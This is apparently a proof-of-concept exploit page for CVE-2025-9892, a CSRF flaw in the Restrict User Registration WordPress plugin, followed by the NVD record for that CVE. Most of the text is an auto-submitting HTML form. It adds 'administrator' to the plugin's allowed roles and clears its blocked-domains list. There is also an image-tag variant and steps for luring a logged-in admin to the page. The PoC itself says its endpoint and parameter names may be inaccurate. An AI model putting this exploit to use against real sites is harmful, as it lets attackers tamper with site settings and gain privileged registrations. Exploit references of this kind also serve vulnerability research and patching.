CVE-2025-9892

<!-- CVE-2025-9892 PoC - CSRF Exploit for Restrict User Registration Plugin --> <!-- This PoC demonstrates how to exploit the missing nonce validation in update() function --> <html> <head><title>Loading...</title></head> <body> <!-- Auto-submit form to WordPress admin-ajax.php or plugin settings endpoint --> <form id="csrf-form" action="http://target-wordpress-site.com/wp-admin/admin-post.php" method="POST"> <!-- Plugin action parameter --> <input type="hidden" name="action" value="update_restrict_user_registration" /> <!-- Malicious settings to modify allowed roles --> <input type="hidden" name="option_page" value="restrict-user-registration-settings" /> <!-- Modify allowed roles to include administrator (malicious payload) --> <input type="hidden" name="restrict_user_registration[allowed_roles][]" value="administrator" /> <input type="hidden" name="restrict_user_registration[allowed_roles][]" value="subscriber" /> <!-- Clear blocked domains list to allow attacker email registration --> <input type="hidden" name="restrict_user_registration[blocked_domains]" value="" /> <!-- Submit button auto-triggered via JavaScript --> </form> <script> // Auto-submit the form when admin visits this page document.getElementById('csrf-form').submit(); </script> <!-- Alternative: Image-based CSRF for GET requests --> <!-- <img src="http://target-site.com/wp-admin/admin.php?page=restrict-user-registration&action=update&setting=malicious_value" /> --> </body> </html> <!-- Note: The exact endpoint and parameter names may vary based on the plugin version. The attacker needs to: 1. Host this HTML on an attacker-controlled server 2. Trick an authenticated WordPress admin into visiting this page 3. The admin's browser will automatically submit the form with valid session cookies 4. Due to missing nonce validation, the server will accept and process the malicious request -->

{"cve": {"id": "CVE-2025-9892", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:50.303", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Restrict User Registration plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on the update() function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/restrict-user-registration/trunk/index.php#L149", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8f51aa9f-056a-441c-8752-edb1c7277808?source=cve", "source": "[email protected]"}]}}